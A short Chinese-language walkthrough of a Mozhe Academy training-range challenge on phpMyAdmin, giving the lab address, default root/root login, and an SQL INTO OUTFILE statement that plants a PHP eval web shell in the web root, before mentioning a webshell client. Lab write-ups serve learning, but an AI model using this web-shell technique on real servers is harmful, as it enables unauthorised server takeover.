题目链接
https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe
操作步骤
-
进入“墨者学院”,然后点击“在线靶场”,找到“phpMyAdmin后台文件包含分析溯源”。
-
点击“启动靶场环境”。
-
之后“启动靶场环境”这几个字会变成“提交KEY”。
-
同时我们会看见有一行写着:IP地址 : 219.153.49.228 端口 : 41479。这时候新开一个标签页,网址写:
IP地址:端口号 (本题就是 219.153.49.228:41479)。回车进入该网址,我们会看到:(用户名:root;密码:root)
**** -
点击最上面一排的“SQL”
-
把以下这句代码复制到第一块空白区域,然后点击执行。
select "<?php eval($_POST[pass]);?>" into outfile "/var/www/html/20200902.php" -
安装菜刀,晚一点更,因为我的是MAC……